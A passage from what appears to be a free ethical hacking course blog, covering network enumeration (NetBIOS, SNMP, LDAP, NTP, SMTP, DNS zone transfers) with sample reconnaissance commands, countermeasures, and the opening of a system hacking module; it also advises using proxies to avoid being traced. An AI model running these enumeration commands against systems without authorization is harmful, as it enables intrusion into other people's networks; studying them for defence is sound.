as Nessus, these tools help you find the vulnerabilities present in the target system or
network.
5. Draw network diagrams
Draw a network diagram of the target organization that helps you understand the logical
connection and the route to the destination host on the network. The network diagram can
be drawn with the help of tools such as OpManager, the network diagrams provide
valuable information about the network and its architecture.
6. Proxies
Prepare proxies using tools like Proxifier, to avoid being traced.
7. Document all findings
The last step, but the most important in scanning penetration tests, is to preserve all the
results of the test performed in the previous steps in a document. This document will help
you find potential vulnerabilities in your network. Once you determine the potential
vulnerabilities, you can plan the countermeasures accordingly. Therefore, penetration tests
help you evaluate the security of your network before a weakness becomes a real problem.

This module ends here; I hope you have learned the objectives of this module. A lot of effort goes
into this course and it is free, so I would like you to share it on your social networks or hacking forums so that
more people see it. This course will continue until it reaches at least 20 modules and will become more
advanced; you can subscribe if you want to follow the progress of the course, and every 7 days an
email is sent summarizing everything that happens on the blog. See you soon!

Practice: Ethical Hacking Course - Practice 3 - Network Scanning

12 February 2018

Ethical Hacking Course - Module 4 - Enumeration of Objective Systems
Ethical Hacking Course, Computer Security

If you already saw the previous module of this ethical hacking course, which taught us how network
scanning works, this module deals with the enumeration of the target system: basically, enumerating
the information exposed by each service running on the system, looking specifically for information
about the network, system user groups, device names, and so on. All of this is performed actively,
that is, the target can easily detect this activity.

Full course: en.gburu.net/hack, here you will find all the topics of this free ethical hacking
course, in one place.
Responsibility:
This ethical hacking course is aimed at educational purposes to improve your computer security
skills to plan and design safer networks, does not encourage illegal activities in systems or
networks of third parties; if you commit an illicit activity in a system or network, you will do so at
your own risk. If you want to practice and improve your skills in ethical hacking, do it under
systems where you have a legal permit or are yours, I recommend using images of operating
systems installed in virtual machines in a controlled environment.

Agenda: Module 4 - Enumeration of Objective Systems

 Objectives of module 4
 Introduction to System Enumeration
 Common techniques for system enumeration
 Services and ports, ideal for enumeration
o TCP 53: Zone Transfer with DNS
o TCP 135: Microsoft RPC
o TCP 137: NetBIOS Name Service (NBNS)
o TCP 139: NetBIOS Session Service (SMB over NetBIOS)
o TCP 445: SMB over TCP
o UDP 161: Simple Network Management Protocol (SNMP)
o TCP/UDP 389: Lightweight Directory Access Protocol (LDAP)
o TCP/UDP 3268: Global Catalog Service
o TCP 25: Simple Mail Transfer Protocol (SMTP)
 NetBIOS Enumeration
o Useful tools for NetBIOS enumeration
o Useful tools for the enumeration of Users
 System Enumeration, using default passwords
 Simple Network Management Protocol (SNMP) Enumeration
o Management Information Base (MIB)
o Tools for SNMP enumeration
 UNIX and Linux Enumeration
o Finger Enumeration
o Enumeration with rpcinfo
o Enumeration with rpcclient
o Enumeration with showmount
o Enumeration with enum4linux
 LDAP Enumeration
o LDAP Administrator
 NTP Enumeration
 SMTP Enumeration
o Tools for SMTP enumeration
 DNS Enumeration
 Countermeasures for System Enumeration
o Countermeasures for SNMP enumeration
o Countermeasures for DNS Enumeration
o Countermeasures for SMTP Enumeration
o Countermeasures for LDAP enumeration
o Countermeasures for SMB enumeration
 The importance of Enumeration in Pentesting

Objectives of Module 4
In the previous modules you learned about the recognition and scanning of the
target. The next phase of pentesting is enumeration. As a pentester, you should know
what the purpose of system enumeration is, the techniques used to perform the
enumeration, where the enumeration applies, what information it obtains, the enumeration
tools available and the countermeasures that can strengthen the security of the network and of the
target itself. All of these topics are covered in this module.

Let's talk about the following:

 Introduction to the Enumeration of Systems


 Techniques to apply an enumeration
 Services and ports, ideal for enumeration
 Enumeration of UNIX / Linux
 Countermeasures to avoid being victims of an enumeration
 The importance of the enumeration in the Pentesting

Introduction to System Enumeration


The enumeration of systems is defined as the process of extracting user names, machine
names, network resources, shared resources and services from a system. In the enumeration phase,
the attacker creates active connections to the system and performs targeted queries to obtain
more information about the target. The attacker uses the information collected to identify
vulnerabilities or weaknesses in the security of the system and then tries to exploit them.
Enumeration techniques are usually carried out in an intranet environment and involve making active
connections to the target system. It is possible for the attacker to stumble upon a remote IPC share,
such as IPC$ in Windows, which can be probed with a null session that allows shares
and accounts to be enumerated.

The previous modules of this computer security course highlighted how the attacker gathers the
necessary information about the target. The type of information enumerated by attackers can be
grouped loosely into the following categories:

 Network resources and shares


 Users and groups
 Routing tables
 Audit and services configuration
 Names of machines
 Applications and banners
 Details of SNMP and DNS
Techniques for Enumeration
In the enumeration process, an attacker collects data such as network users and group names,
routing tables, and Simple Network Management Protocol (SNMP) information. This module of
the computer security course explores the possible ways in which an attacker can enumerate a
target network, and what countermeasures can be taken.

The following are the different enumeration techniques that attackers can use:

 Extract user names from email IDs: In general, each email ID contains two parts, one is a
username and the other is a domain name, following the structure "username@domainname".
Consider gpostsocial@gmail.com: in this email ID, "gpostsocial"
(the characters that precede the @ symbol) is the username and "gmail.com" (the characters that
follow the @ symbol) is the domain name.
 Extract information by using default passwords: Many online resources provide lists
of default passwords assigned by the manufacturer for their products. Often users forget
to change the default passwords provided by the manufacturer or developer of the
product. If users do not change their passwords for a long time, attackers can easily list
their data.
 Brute force Active Directory: Microsoft Active Directory is susceptible to a
username enumeration weakness at the point where the input provided by the user is verified.
This is the consequence of a design error in the application. If the "logon
hours" feature is enabled, attempts to authenticate to the service result in different
error messages. Attackers take advantage of this and exploit the weakness to
enumerate valid usernames. If an attacker manages to reveal valid usernames, he or she can
perform a brute force attack to reveal the respective passwords.
 Extract user names using SNMP: attackers can easily guess the SNMP community
strings and, through the SNMP API, extract the required user names.
 Extract Windows user groups: extract user accounts from specific groups, store
the results, and verify whether the session accounts belong to the group or not.
 Extract information using DNS zone transfers: a DNS zone transfer reveals a large amount
of valuable information about the particular zone you request. When a DNS
zone transfer request is sent to a DNS server that allows it, the server transfers its DNS records,
which contain information such as host names and IP addresses. An attacker can obtain valuable
topological information about a target's internal network through a DNS zone transfer.

Services and ports, ideal for enumeration


 TCP 53: Zone Transfer with DNS
DNS zone transfer depends on TCP port 53 instead of UDP 53. If TCP 53 is in use, it
means that the DNS zone transfer is in process. The TCP protocol helps maintain a DNS
database between DNS servers. This communication occurs only between DNS servers.
DNS servers always use the TCP protocol for zone transfer. The established connection
between the DNS servers transfers the data of the zone and also helps the originating and
destination DNS servers to guarantee the coherence of the data by means of the TCP
ACK bit.

 TCP 135: Microsoft RPC


RPC port 135 is used by client/server applications, including the Windows messaging
services behind pop-up messages; to stop such pop-up windows, you will need to filter port 135 at the
firewall level. When a client tries to connect to an RPC service, it goes through this dispatcher
(the endpoint mapper) to discover where the service is located.

 TCP 137: NetBIOS Name Service (NBNS)


NBNS, also known as the Windows Internet Name Service (WINS), provides a name
resolution service for computers running NetBIOS. NetBIOS name servers maintain
a database of NetBIOS names for hosts and the corresponding IP address each host is
using. The job of NBNS is to match NetBIOS names to IP addresses in response to queries. The
name service is usually the first service that will be attacked.

 TCP 139: NetBIOS Session Service (SMB over NetBIOS)


The NetBIOS session service is used to set up and tear down sessions between NetBIOS-capable
computers. Sessions are established by exchanging packets. The
computer that establishes the session attempts a TCP connection to port 139 on the
computer with which the session will be established. If the connection succeeds, the
initiating computer sends over the connection a "Session Request"
packet with the NetBIOS name of the application establishing the session and the
NetBIOS name to which the session will be established. The computer with which the
session is being established responds with a "Positive session response" indicating that
a session can be established, or a "Negative session response" indicating that no session
can be established.

 TCP 445: SMB over TCP


By using TCP port 445, you can access Microsoft networking directly over TCP/IP without the help
of a NetBIOS layer. This service is only available in more recent versions of Windows, such as
Windows 2K/XP. File sharing in Windows 2K/XP is done through
the Server Message Block (SMB) protocol, and SMB can also run directly over
TCP/IP in Windows 2K/XP without the additional NetBT layer; TCP
port 445 is used for this purpose.

 UDP 161: Simple Network Management Protocol (SNMP)


You can use the SNMP protocol for various devices and applications (including firewalls
and routers) to communicate registration and management information with remote
monitoring applications. SNMP agents listen on UDP port 161, asynchronous traps are
received on port 162.

 TCP/UDP 389: Lightweight Directory Access Protocol (LDAP)


The Lightweight Directory Access Protocol (LDAP) is an Internet protocol used by
MS Active Directory, as well as by some email programs, to look up contact information from
a server. Both Microsoft Exchange and NetMeeting install an LDAP server on this port.
 TCP/UDP 3268: Global Catalog Service
The Microsoft Global Catalog service normally listens on TCP port 3268. TCP is a
connection-oriented protocol that requires a three-way handshake to establish end-to-
end communication; only then can user data be sent bi-directionally through the connection,
and TCP guarantees that packets on port 3268 are delivered in the same order in which they
were sent. UDP port 3268 can be used for connectionless communication; it provides an
unreliable service in which datagrams may arrive duplicated, out of order or go missing
without notice, and error checking and correction are left to the application, avoiding that
overhead at the network interface level. UDP (User Datagram Protocol) is a minimal
message-oriented transport layer protocol; examples that often use UDP include voice
over IP (VoIP), streaming media and real-time multiplayer games.

 TCP 25: Simple Mail Transfer Protocol (SMTP)


SMTP allows you to move email across the Internet and across your local network. It
runs on the connection-oriented service provided by the Transmission Control Protocol
(TCP) and uses the well-known port number 25. You can telnet to port 25 on a remote host; this
technique is sometimes used to test the SMTP server of a remote system, and the same
command-line technique illustrates how mail is delivered between systems. A quick way to
check which of these enumeration-friendly ports a host exposes is sketched right after this list.
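To get a quick picture of which of the ports listed above are exposed on a host, a single Nmap scan can check the usual TCP and UDP enumeration ports. This is a minimal sketch; the target address is a placeholder, the scan needs raw-socket privileges, and it assumes the Global Catalog listens on its usual port 3268.

nmap -sS -sU -p T:25,53,135,137,139,389,445,3268,U:53,137,161,162,389 192.168.56.101   # check common enumeration ports over TCP and UDP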

NetBIOS enumeration

The first step in enumerating a Windows machine is to take advantage of the NetBIOS API.
NetBIOS stands for Network Basic Input Output System. IBM, in partnership with Sytek,
developed NetBIOS as an Application Programming Interface (API),
originally to give client software access to LAN resources. A NetBIOS name is a
unique 16-character ASCII string used to identify network devices over TCP/IP; 15 characters are
used for the device name and the 16th character is reserved for the service or name record
type.

Attackers use the NetBIOS enumeration to obtain:

 List of computers belonging to a domain and the shares of individual hosts in the network
 Policies and passwords

If an attacker finds a Windows operating system with port 139 open, he would be interested to
verify what resources he can access or see on the remote system. However, to list the NetBIOS
names, the remote system must have enabled the sharing of files and printers. Using these
techniques, the attacker can launch two types of attacks on a remote computer that has NetBIOS.
The attacker can choose to read / write to a remote computer system, depending on the
availability of shared resources, or initiate a denial of service.
Useful tools for NetBIOS enumeration:

1. Nbtstat shows NetBIOS over TCP/IP (NetBT) protocol statistics, the NetBIOS
name tables for the local computer and remote computers, and the NetBIOS name cache.
Nbtstat also allows you to refresh the NetBIOS name cache and the names registered with the
Windows Internet Name Service (WINS). Used without parameters, Nbtstat shows its help
(a sample invocation follows this list).
2. SuperScan is a connection-based TCP port scanner, pinger and hostname resolver.
It performs ping sweeps and scans any IP range with multi-threaded and
asynchronous techniques.
3. NetBIOS Enumerator is recommended when you want to find out how to use remote
network support and how to deal with other related protocols, such as SMB.
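A minimal NetBIOS enumeration session from a Windows command prompt might look like the following; the IP address is a placeholder for a lab host you are authorized to test.

nbtstat -A 192.168.56.101    # NetBIOS name table of the remote machine, queried by IP address
nbtstat -c                   # contents of the local NetBIOS name cache
net view \\192.168.56.101    # shares exposed by the remote host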

Useful tools for the enumeration of Users:

1. PsExec is a command-line telnet replacement that allows you to run
processes on other systems, with full interactivity for console applications, without having to manually install
client software. When you use a specific user account, PsExec transmits the credentials
in cleartext to the remote workstation, thus exposing the credentials to anyone who is
listening (a hypothetical invocation is shown after this list).
2. PsFile is a command-line utility that displays a list of files on a system that opens
remotely, and also allows you to close open files, either by name or by a file identifier.
The default behavior of PsFile is to list the files on the local system that are open by
remote systems. Writing a command followed by "-" shows information about the
command syntax
3. PsGetSid allows you to translate a SID into its display name and vice versa. It works on
integrated accounts, domain accounts and local accounts. It also allows you to see the
SIDs of the user accounts and translates a SID into the name that represents it and works
across the network so you can query the SID remotely.
4. PsKill is a removal tool that can kill processes on remote systems and terminate
processes on the local computer. You do not need to install any client software on the
target computer to use PsKill to complete a remote process.
5. PsInfo is a command-line tool that gathers key information about the local or remote
Windows NT / 2000 system, including the type of installation, kernel compilation, owner
and registered organization, number of processors and their type, amount of physical
memory, installation date of the system and, if it is a trial version, the expiration date.
6. PsList is a command-line tool that administrators use to view process CPU and
memory usage or thread statistics. The tools in the resource kits,
pstat and pmon, show you different types of data, but only show the information related
to the processes in the system in which you run the tools.
7. PsLoggedOn is an applet that shows users logged on locally and remotely. If you specify a
user name instead of a computer, the PsLoggedOn tool searches all the computers in the
neighborhood of the network and tells you if the user is currently connected. The
PSLoggedOn definition of a locally connected user is one that has its profile loaded in the
Registry, so PsLoggedOn determines who initiates the session by scanning the keys
under the HKEY_USERS key.
8. PsLogList displays the contents of the system event log on the local computer, with a
visually friendly format of the event log records. The command line options allow you to
view the records on different computers, use a different account to view a record, or have
the output formatted in a friendly way to search for strings.
9. PsPasswd is a tool that allows the administrator to create batch files that run PsPasswd on
the computer network to change the administrator password as part of the standard
security practice.
10. PsShutdown is a command-line tool that allows you to shut down PCs remotely over the
network. You can log off the console user or lock the console (locking requires
Windows 2000 or higher). It does not require any manual installation of the client's
software.
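As a hedged illustration, a hypothetical PsExec session against a lab host could look like the following; the IP address, domain, user and password are placeholders, not real values.

psexec \\192.168.56.101 -u LAB\admin -p P@ssw0rd cmd.exe    # open an interactive remote command prompt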

Enumeration of Systems, using default passwords


Devices such as switches, hubs, routers and access points generally come with "default
passwords". Not only network devices but also some local and online applications have built-in
default passwords. These passwords are provided by application vendors or programmers during
product development. Most users use these applications or devices without changing the default
passwords provided by the provider or programmer. If you do not change these default
passwords, you may be at risk because the default password lists for many products and
applications are available online. One such example is cirt.net/passwords, which provides verified
login/password pairs for common network devices. The logins and passwords contained in this
database are configured by default when the hardware or software is installed for the first time
or, in some cases, are hard-coded in the hardware or software.

Attackers take advantage of these default passwords and online resources that provide default
passwords for various products and applications. Attackers gain unauthorized access to the
organization's computer network and information resources through the use of common and
default passwords.

Enumeration of the Simple Network Management Protocol (SNMP)

SNMP (Simple Network Management Protocol) is an application layer protocol that runs over UDP
and is used to maintain and manage routers, hubs and switches in an IP network. SNMP agents
run on network devices in both Windows and UNIX networks.

SNMP Enumeration is the process of enumerating user accounts and devices on a destination
computer using SNMP. SNMP uses two types of software components to communicate. They
are the SNMP agent and the SNMP management station. The SNMP agent is in the network
device while the SNMP management station communicates with the agent.

Almost all network infrastructure devices, such as routers and switches, contain an SNMP
agent to manage the system or device. The SNMP management station sends requests to the
agent and, after receiving a request, the agent sends back a response. Both the requests and the
responses refer to configuration variables that the agent software can access. SNMP management
stations can also send requests to set the values of some variables. Traps inform the management station
when something happens on the agent's side, such as a reboot, an interface failure or any other
abnormal event. SNMP uses two passwords that you can use to configure and access the
SNMP agent from the management station.

The two SNMP passwords are:

1. Read community string:


o The configuration of the device or system can be seen with the help of this
password
o These strings are public
2. Read/write community string:
o The settings on the device can be changed or edited using this password
o These strings are private

When the community strings are left at their default configuration, attackers take advantage of
the opportunity and find gaps through them. The attacker can then use these default passwords to
change or view the configuration of the device or system. Attackers enumerate SNMP to extract
information about network resources, such as hosts, routers, devices and shares, and network
information, such as ARP tables, routing tables, device-specific information and traffic statistics.
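A minimal SNMP enumeration sketch using the Net-SNMP command-line tools is shown below; the IP address is a placeholder, the community string "public" is the common default, and the final OID is one commonly cited for the Windows user-name table in the LAN Manager MIB.

snmpwalk -v2c -c public 192.168.56.101                          # walk the whole MIB tree with the default read community
snmpwalk -v2c -c public 192.168.56.101 1.3.6.1.4.1.77.1.2.25    # query the Windows user table (LAN Manager MIB)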

Management Information Base (MIB)

MIB is a virtual database that contains a formal description of all network objects that can be
managed using SNMP. MIB is the collection of information organized hierarchically. Provides a
standard representation of the information and storage of the SNMP agent. MIB elements are
recognized using object identifiers. Object ID is the numeric name given to the object and starts
with the root of the MIB tree. The object identifier can uniquely identify the object present in the
MIB hierarchy.

Objects managed by MIB include scalar objects that define a single instance of object and
tabular objects that define groups of instances of related objects. Object identifiers include the
type of object, such as counter, string or address, access level, such as read or read/write, size
restrictions and range information. MIB is used as a codebook by the SNMP manager to convert
the OID numbers into a human readable screen.
The content of the MIB can be accessed and viewed with a web browser, either by entering the
IP address and Lseries.mib or by entering the DNS library name and Lseries.mib. For
example, http://IP/Lseries.mib or http://library_name/Lseries.mib.

Microsoft provides the list of MIBs that are installed with the SNMP Service in the Windows
resource kit. The main ones are:

DHCP.MIB: monitors network traffic between DHCP servers and remote hosts
HOSTMIB.MIB: monitors and manages host resources
LNMIB2.MIB: Contains object types for workstation and server services
WINS.MIB: for the Windows Internet name service

Tools for SNMP enumeration

 OpUtils is a collection of tools with which network engineers can monitor, diagnose and
troubleshoot their IT resources. You can control the availability and other activities of
critical devices, detect unauthorized access to the network and manage IP addresses. It
allows you to create custom SNMP tools through which you can monitor the MIB nodes.
 Nsauditor is a network security auditing, scanning and vulnerability detection tool that
monitors network access to shared files and folders and helps detect and control violations
of network data access policies.

Enumeration of UNIX and Linux

The commands used to enumerate the UNIX network resources are the following: showmount,
finger, rpcinfo (RPC) and rpcclient.

Finger Enumeration

Finger is used to list users on the remote machine. It allows you to view the user's home
directory, the login time, the hours of inactivity, the location of the office and the last time they
received or read an email.

finger <option> <user>

Enumeration with rpcinfo (RPC)


rpcinfo helps you enumerate the remote procedure call (RPC) protocol, which in turn allows applications to
communicate over the network.

rpcinfo <option> <host>

Enumeration with rpcclient

rpcclient is used to enumerate users on Linux and UNIX systems.

Enumeration with showmount

showmount identifies and lists the shared directories available on a system. Clients that have
remotely mounted a file system from a host are listed by showmount. mountd is an RPC
server that answers NFS access information and file system mount requests; the mountd
server on the host maintains the information obtained, which is kept in the /etc/rmtab file.
The default value for the host is the value returned by hostname.
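The following commands sketch a typical UNIX/Linux enumeration session; the IP address is a placeholder for a lab host you control.

finger @192.168.56.101               # users currently logged in on the remote host
rpcinfo -p 192.168.56.101            # RPC programs registered on the host and their ports
showmount -e 192.168.56.101          # NFS exports offered by the host
rpcclient -U "" -N 192.168.56.101    # open a null-session SMB/MSRPC connection for further queries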

Enumeration with Enum4linux

enum4linux is a tool that allows you to enumerate information from Samba hosts as well as from Windows systems (a sample run follows the feature list below).

Features:

 RID Cycling (When RestrictAnonymous is set to 1 in Windows 2000)


 List of users (when RestrictAnonymous is set to 0 in Windows 2000)
 List of group membership information
 Enumeration of shares
 Detecting if the host is in a work group or a domain
 Identification of the remote operating system
 Recovery of the password policy (using polenum)
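A minimal enum4linux run against a lab host might look like the following; the IP address is a placeholder and -a asks the tool to perform all of its simple enumeration checks.

enum4linux -a 192.168.56.101    # users, shares, group membership, OS details and password policy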

LDAP Enumeration

The Lightweight Directory Access Protocol (LDAP) is used to access directory listings within an
Active Directory or other directory services. A directory is organized in a hierarchical or logical
form, a bit like the levels of management and employees in a company. LDAP integrates
with the Domain Name System (DNS) to allow quick searches and fast resolution of queries. It
usually runs on port 389, like other similar protocols. The LDAP service can often be queried
anonymously, and such a query can divulge sensitive information, such as user names, addresses,
department details and server names, that the attacker can use to launch an attack.
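A hedged example of an anonymous LDAP query using the OpenLDAP ldapsearch client is shown below; the host, base DN and filter are placeholders and the query assumes the directory allows anonymous binds.

ldapsearch -x -H ldap://192.168.56.101 -b "dc=example,dc=com" "(objectClass=user)" sAMAccountName    # list account names via an anonymous simple bind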
LDAP Administrator

Softerra LDAP Administrator is an LDAP administration tool that allows you to work with
LDAP servers such as Active Directory, Novell Directory Services, Netscape / iPlanet, etc.
Generate customizable directory reports with the necessary information for effective monitoring
and auditing.

Features:

 Provides directory search facilities, mass update operations, group membership
management facilities, etc.
 It supports LDAP-SQL, which allows you to manage LDAP entries using syntax similar
to SQL.

Enumeration of NTP
Before we start with NTP enumeration, let's first analyze what the NTP is. NTP is a network
protocol designed to synchronize clocks of networked computer systems. NTP is important when
directory services are used. It uses UDP port 123 as its main means of communication. NTP can
keep time to within 10 milliseconds (1/100 of a second) over the public Internet, and it can achieve
accuracies of 200 microseconds or better on local area networks under ideal conditions.

Through the enumeration of NTP, you can collect information such as lists of hosts connected to
the NTP server, IP addresses, system names and operating systems that run on client systems in a
network. All this information can be listed when consulting the NTP server. If the NTP server is
in the DMZ, it is also possible to obtain internal IP addresses.

NTP enumeration can be done using the command-line tools of the NTP suite, which are
used to query the NTP server to obtain the desired NTP information. The suite
includes the following commands (example invocations follow the list):

 ntptrace: this command helps you determine from where the NTP server updates its time
and tracks the chain of NTP servers from a given host to the main source.
 ntpdc: this command will help you consult the ntpd daemon about its current status and
request changes in that state.
 ntpq: this command will help you monitor the operations of NTP daemon ntpd and
determine performance.
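Hedged example invocations of these tools are shown below; the server address is a placeholder, and the monlist query only works against older ntpd versions that still have it enabled.

ntptrace 192.168.56.10              # trace the chain of NTP servers back to the primary source
ntpq -p 192.168.56.10               # list the peers the server synchronizes with
ntpdc -n -c monlist 192.168.56.10   # hosts that recently queried the server (older ntpd only)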

SMTP Enumeration
SMTP enumeration allows you to determine valid users on an SMTP server. This is achieved
with the help of three built-in SMTP commands. The three commands are:

 VRFY: this command is used to validate users


 EXPN: This command tells the actual delivery address of aliases and mailing lists
 RCPT TO: defines the message recipients

SMTP servers respond differently to the VRFY, EXPN and RCPT TO commands for valid and
invalid users. Therefore, by observing the response of the SMTP server to these commands, one
can easily determine valid users on the SMTP server. The attacker can also communicate directly
with the SMTP server through a telnet or netcat prompt, as sketched below.
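A minimal manual probe of an SMTP server is shown below; the IP address and user names are placeholders, and the lines after the telnet command are typed inside the SMTP session.

telnet 192.168.56.101 25
HELO test.local
VRFY root
VRFY nosuchuser
EXPN postmaster
QUIT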

Tools for SMTP enumeration

The SMTP Email Generator in NetScanTools Pro allows you to test the process of sending an
email message through an SMTP server. You can extract all common parameters from the email
header, including confirmation/urgent indicators. You can register the email session in the log
file and then view the log file that shows the communications between NetScanTools Pro and the
SMTP server.

The NetScanTools Pro email relay check tool allows you to perform a relay test by
communicating with an SMTP server. The report includes a record of communications between
NetScanTools Pro and the destination SMTP server.

DNS Enumeration

The attacker performs a DNS zone transfer enumeration to locate the DNS server and the records
of the target organization. Through this process, an attacker gathers valuable network
information, such as DNS server names, host names, machine names, user names and IP
addresses of possible targets. To perform the DNS zone transfer enumeration, you can use tools
such as nslookup, DNSstuff, etc. These tools allow you to extract the same information that an
attacker collects from the DNS servers of the target organization.

To perform a DNS zone transfer, you send a zone transfer request to the DNS server while
pretending to be a client; the DNS server then sends you a portion of its database as a zone. This zone
can contain a lot of information about the target's network, such as host names, IP addresses and other
details of the DNS zone. A sample zone transfer request is shown below.
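Two common ways to request a zone transfer are sketched below; the domain and name server are placeholders, and the lines starting with ">" are typed at the interactive nslookup prompt.

dig axfr example.com @ns1.example.com    # request a full zone transfer from the target's name server

nslookup
> server ns1.example.com
> set type=any
> ls -d example.com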

Countermeasures for the Enumeration of Systems


You can apply the following countermeasures to prevent information leakage through various
types of enumeration.

Countermeasures for SNMP enumeration


 Remove the SNMP agent or turn off the SNMP service of your system.
 If turning off SNMP is not an option, change the name of the default "public"
community.
 Upgrade to SNMPv3, which encrypts passwords and messages.
 Implement the group policy security option called "Additional restrictions for anonymous
connections".
 Restrict access to null session pipelines, null session shares, and IPSec filtering.
 Block access to TCP/UDP ports 161.
 Do not install the Windows administration and monitoring component unless necessary.
 Encrypt or authenticate using IPSEC.

Countermeasures for DNS enumeration

 Configure all name servers so that they do not send DNS zone transfers to untrusted
hosts.
 Check the DNS zone files of the publicly accessible DNS server and make sure that the
IP addresses of these files are not referenced by hostnames that are not public.
 Make sure that the DNS zone files do not contain HINFO or any other unnecessary records.
 Provide standard network administration contact details in Network Information Center (NIC)
databases; this helps to avoid war dialing or social engineering attacks.
 Configure the files in the DNS zone to avoid unnecessary information being revealed.

Countermeasures for the SMTP enumeration

 Ignore emails to unknown recipients.


 Do not include the sensitive mail server and the local host information in the mail
responses.
 Disable the open relay function and configure SMTP servers to ignore email messages
addressed to unknown recipients.

Countermeasures for LDAP enumeration

 Use NTLM or basic authentication to limit access only to known users.


 By default, LDAP traffic is transmitted unencrypted; use SSL/TLS to encrypt the
traffic.
 Select a username different from your email address and enable account lockout.

Countermeasures for SMB enumeration

File sharing services and other unused services can be doorways through which attackers enter
your network. Therefore, you must disable these services to prevent information leaks or other
types of attacks; if you do not disable them, they remain vulnerable to enumeration.
Server Message Block (SMB) is a service designed to provide shared access to files, serial ports,
printers and communications between nodes in a network. If this service is running on your
network, then you will be at high risk of being attacked.

The importance of Enumeration in Pentesting


You must apply all possible enumeration techniques to gather as much information as you can about the
target. To guarantee the full scope of the test, the pentest is divided into steps. This penetration
test includes the following series of steps to obtain the desired information.

1. Find the range of the network: if you want to enter the network of an organization, you
must first know the range of the network. This is because, if you know the range of the
network, you can mask yourself as a user that is within the range and then try to access
the network. Then, the first step in the pentesting of enumeration is to obtain information
about the range of the network. You can find the network range of the target organization
with the help of tools like Whois Lookup.
2. Calculate the subnet mask: once you find the range of the target network, then calculate
the subnet mask required for the IP range.
3. Perform host discovery: find the important servers connected to the Internet using
tools such as Nmap.
4. Scan the ports: it is very important to discover the open ports and close them if they are
not necessary. This is because the open ports are the doors for an attacker to break the
security perimeter of a target. Therefore, perform port scanning to verify the open ports
on the hosts. This can be achieved with the help of tools such as Nmap.
5. Perform DNS Enumeration: Perform a DNS enumeration to locate all DNS servers and
their records. DNS servers provide information such as system names, user names, IP
addresses, etc. You can extract all this information with the help of the Windows utility
nslookup.
6. NetBIOS Enumeration: Perform a NetBIOS enumeration to identify network devices
through TCP/IP and to obtain a list of computers belonging to a domain, a list of shared
resources on individual hosts, policies and passwords
7. Perform SNMP enumeration: perform the SNMP enumeration by consulting the SNMP
server on the network. The SNMP server can reveal information about user accounts and
devices.
8. Perform UNIX/Linux enumeration: perform the enumeration using tools such as
enum4linux. You can use commands like showmount, finger, rpcinfo (RPC) and
rpcclient, etc. to list the UNIX network resources.
9. Perform the LDAP enumeration: consult the LDAP service, you can list valid user
names, departmental details and address details. You can use this information to perform
social engineering and other types of attacks.
10. Perform the NTP enumeration: to extract information, such as the host connected to the
NTP server, the IP address of the client, the operating system of the client systems, etc.
You can get this information with the help of commands like ntptrace, ntpdc and ntpq.
11. Perform the SMTP Enumeration: to determine valid users in the SMTP server.
12. Document everything found: the last step of every penetration test is to document all the
findings obtained during the test. You should analyze them and suggest countermeasures so
that your client can improve their security.

This module ends here; I hope you have achieved its objectives. This course takes a lot of effort
and it is free, so I would appreciate it if you shared it on your social networks or in hacking forums so that
more people see it. The course will grow to at least 20 modules and will become more
advanced; you can subscribe if you want to follow its progress, and every 7 days I send an
email summarizing everything that happens on the blog. See you soon!

Practice: Ethical Hacking Course - Practice 4 - Enumeration of Systems

26 February 2018

Ethical Hacking Course - Module 5 - System Hacking
Ethical Hacking Course, Computer Security

In the previous modules we saw the theory and practice of finding vital information about a
target. In module 5 we will talk about the computer attacks that can be carried out against a
target system or network. This module is about system hacking proper: it belongs to the phase
of the pentest where we launch our attacks, trying to break the target's security in order,
ultimately, to improve the security of the target itself. We will also see simulated attacks in a
controlled environment in the practice session of this module of the free ethical hacking course.

Full course: en.gburu.net/hack, here you will find all the topics of this free ethical hacking
course, in one place.

Responsibility:
This ethical hacking course is intended for educational purposes, to improve your computer security
skills so you can plan and design safer networks. It does not encourage illegal activities against
third-party systems or networks; if you commit an illicit activity against a system or network, you do so
at your own risk. If you want to practice and improve your ethical hacking skills, do it on
systems that are yours or where you have legal permission; I recommend using images of operating
systems installed in virtual machines in a controlled environment.

Agenda: Module 5 - System Hacking

 Objectives of module 5
 Before an IT Attack
 Objectives of an IT Attack
 Password decryption
 The complexity of the password
 Password decoding techniques
o Dictionary attacks
o Brute Force Attacks
o Hybrid attacks
o Syllable attacks
o Rule-based attacks
 Types of password attacks
o Passive attack online
o Active attack online
o Attack offline (Offline)
o Non-electronic attacks
 Passive attack online: Wire Sniffing
 Online passive attack: Man-in-the-Middle and Relay attacks
 Online active attack: Guess passwords
 Active online attack: Trojans, spyware and keyloggers
o Trojan
o Spyware
o Keylogger
 Online active attack: Hash injection attack
 Online active attack: rainbow tables
o rainbow table
o calculate the hash
o comparing the hash
o Tools to create rainbow tables
 Winrtgen
 RainbowCrack
 Online active attack: distributed network attack
o The DNA server interface
o The DNA client interface
o Recommended tool: Elcomsoft
 Non-electronic attacks
o Dumpster diving
o Shoulder surfing
o Eavesdropping
o sniffing of passwords
o Social engineering
o Default passwords
o Password decryption manual
 Microsoft Authentication
o SAM
o NTLM
o Kerberos
o Salting
o NTLM v1 vs SAM vs NTLM v2
 How to protect our password
o 6 good practices, to protect us from the decryption of passwords
 recommended tools, to decrypt passwords
o pwdump7
o fgdump
o L0phtCrack
o Cain & Abel
 Escalation of Privileges
o Privilege escalation: Recommended tools
o Escalation of Privileges: Countermeasures
 Application Execution
o recommended tools
 RemoteExec
 PDQ Deploy
 Spytech SpyAgent (Keylogger)
 Sound Snooper (Audio Spyware)
 Phone Spy
o Countermeasures against the execution of Malware
o Rootkits
 Why a Rootkit?
 Types of Rootkits
 How to detect a Rootkit?
 Countermeasures against Rootkits
 Countermeasures against Rootkits: recommended programs
 McAfee Stinger
 UnHackMe
 Handling the stream (Stream) NTFS
o How to defend against NTFS transmissions
o Recommended tools
 Steganography
 Cover Tracks
o Tools: Auditpol
 The attack on systems in the Pentesting

Objectives of Module 5
In previous modules we saw how an attacker gradually approaches a target system or network: first
identifying its IP addresses, then its open ports and services, and then actively enumerating whatever extra
information can be obtained. None of that, however, is the attack itself. In this
module of the computer security course we will see the following:

 Before a computer attack


 Objectives of computer attacks
 Password decryption
 How to defend our passwords
 Escalation of privileges
 Detect Rootkits
 Anti Rootkits
 Application execution
 Classification of steganography
 Methods of this analysis
 Attacks with steganography
 Types of Keyloggers and Spywares
 Prevention against Keyloggers and Spywares
 Manipulation of the stream (Stream) NTFS
 Deletion of fingerprints
 The attack of systems in the Pentesting

Before an IT Attack

Before the attacker or the pentester carries out a computer attack, he or she must have
collected information, as we saw in the phases of the pentest. Before starting an audit of the
system and finally launching an effective attack, we have to do the following:

 Recognition
